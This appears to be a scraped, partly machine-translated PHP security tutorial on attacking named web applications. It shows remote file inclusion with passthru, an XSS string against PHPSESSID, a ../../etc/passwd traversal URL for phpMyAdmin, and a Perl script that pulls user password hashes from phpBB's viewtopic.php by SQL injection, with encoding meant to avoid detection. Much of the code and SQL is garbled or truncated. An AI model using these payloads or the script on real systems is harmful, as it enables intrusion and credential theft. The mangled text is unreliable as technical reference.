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PHP page vulnerability analysis and related problem solving_PHP tutorial

2016-07-15 13:22:361365browse







  在这段代码中,$include一般是一个已经设置好的路径,但是我们可以通过自己构造一个路径来达到攻击的目的。比方说我们提交:a.php?include=http://web/b.php,这个web是我们用做攻击的空间,当然,b.php也就是我们用来攻击的代码了。我们可以在b.php中写入类似于:passthru("/bin/ls /etc");的代码。这样,就可以执行一些有目的的攻击了。(注:Web服务器应该不能执行php代码,不然就出问题了。相关详情可以去看<<如何对PHP程序中的常见漏洞进行攻击>>)。在这个漏洞方面,出状况的很多,比方说:PayPal Store Front,HotNews,Mambo Open Source,PhpDig,YABB SE,phpBB,InvisionBoard,SOLMETRA SPAW Editor,Les Visiteurs,PhpGedView,X-Cart等等一些。

  接着,我们再来看一下脚本命令执行漏洞。这是由于对用户提交的URI参数缺少充分过滤,提交包含恶意HTML代码的数据,可导致触发跨站脚本攻击,可能获得目标用户的敏感信息。我们也举个例子:在PHP Transparent的PHP PHP 4.3.1以下版本中的index.php页面对PHPSESSID缺少充分的过滤,我们可以通过这样的代码来达到攻击的目的:http://web/index.php?PHPSESSID=">在script里面我们可以构造函数来获得用户的一些敏感信息。在这个漏洞方面相对要少一点,除了PHP Transparent之外还有:PHP-Nuke,phpBB,PHP Classifieds,PHPix,Ultimate PHP Board等等。

再然后,我们就来看看文件泄露漏洞了,这种漏洞是由于对用户提交参数缺少充分过滤,远程攻击者可以利用它进行目录遍历攻击以及获取一些敏感信息。我们拿最近发现的phpMyAdmin来做例子。在phpMyAdmin中,export.php页面没有对用户提交的'what'参数进行充分过滤,远程攻击者提交包含多个'../'字符的数据,便可绕过WEB ROOT限制,以WEB权限查看系统上的任意文件信息。比方说打入这样一个地址:export.php?what=../../../../../../etc/passwd%00 就可以达到文件泄露的目的了。在这方面相对多一点,有:myPHPNuke,McNews等等。


  还是言规正传,其实在asp中SQL的注入和php中的SQL注入大致相同,只不过稍微注意一下用的几个函数就好了。将asc改成ASCII,len改成LENGTH,其他函数基本不变了。其实大家看到PHP的SQL注入,是不是都会想到PHP-NUKE和PHPBB呢?不错,俗话说树大招分,像动网这样的论坛在asp界就该是漏洞这王了,这并不是说它的论坛安全太差,而是名气太响,别人用的多了,研究的人也就多了,发现的安全漏洞也就越多了。PHPBB也是一样的,现在很大一部分人用PHP做论坛的话,一般都是选择了PHPBB。它的漏洞也是一直在出,从最早phpBB.com phpBB 1.4.0版本被人发现漏洞,到现在最近的phpBB 2.0.6版本的groupcp.php,,以及之前发现的search.php,profile.php,viewtopic.php等等加起来,大概也有十来个样子吧。这也一直导致,一部分人在研究php漏洞的时候都会拿它做实验品,所谓百练成精嘛,相信以后的PHPBB会越来越好。

Okay, let’s analyze the reasons for the vulnerability. Take the viewtopic.php page as an example. When calling viewtopic.php, the "topic_id" is obtained directly from the GET request and passed to the SQL query command without any filtering. The attacker can submit a special SQL string. Used to obtain the MD5 password. Obtaining this password information can be used for automatic login or brute force cracking. (I think no one would want to brute force it, unless there is a particularly important reason). Let’s take a look at the relevant source code first:

The following is a quotation fragment:


# {

#   $topic_id=intval($HTTP_GET_VARS[POST_TOPIC_URL]);


 #   $topic_id=intval($HTTP_GET_VARS['topic']); If the value is obtained, the executed query code will look like the following (if you haven’t seen the PHPBB source code yet, it is recommended that you read it and then look here. The affected systems are: phpBB 2.0.5 and phpBB 2.0.4 ).

The following is a quote fragment:

#    $sql = "SELECT p.post_id

 #     FROM " . POSTS_TABLE . " p, " . SESSIONS_TABLE . " s , " . USERS_TABLE . " u

 #     WHERE s.session_id = '$session_id'

 p.topic_id = $ Topic_id

#and P.post_time & GT; = U.User_lastvisit

#Order by P.post_time ASC

#Limit 1 "; The following test code is provided:

use IO::Socket;

$remote = shift || 'localhost';

$view_topic = shift || /phpBB2/viewtopic.php';

$uid = shift || 2;

$port = 80;

$dBType = 'mysql4'; # mysql4 or pgsql

print "Trying to get password hash for uid $uid server $remote dbtype: $dBType ";

$p = "";

for($index=1 ; $index<=32; $index++)


  $socket = IO::Socket::INET->new(PeerAddr => $remote,

PeerPort => $port,

Proto => "tcp",


or die "Couldnt connect to $remote:$ port: $@ ";

  $str = "GET $view_topic" . "?sid=1&topic_id=-1" . random_encode(make_dbsql()) . "&view=newest" . " HTTP/1.0 ";

print $socket $str;

print $socket "Cookie: phpBB2mysql_sid=1 "; remote ";

 while ($answer = <$socket>)


 if ($answer =~ /location:.*x23(d+)/) # Matches the location: viewtopic.php?p=



 $p .= chr ();





 print " MD5 Hash for uid $uid is $p ";

  # random encode str. helps avoid detection

sub random_encode


$str = shift;

$ret = "";

for ($i=0; $i


 $c = substr($str,$i,1);

 $j = rand length($str) * 1000;



 if (int($j) % 2 || $c eq ' ')


 $ret .= "%" . sprintf("%x",ord($c));





http: //www.bkjia.com/PHPjc/446957.html


From the current network security point of view, the WEB page vulnerability that everyone is most concerned about and exposed to should be ASP. In this regard, Xiaozhu is an expert, I have no say. However, from the perspective of PHP, it is also the same...

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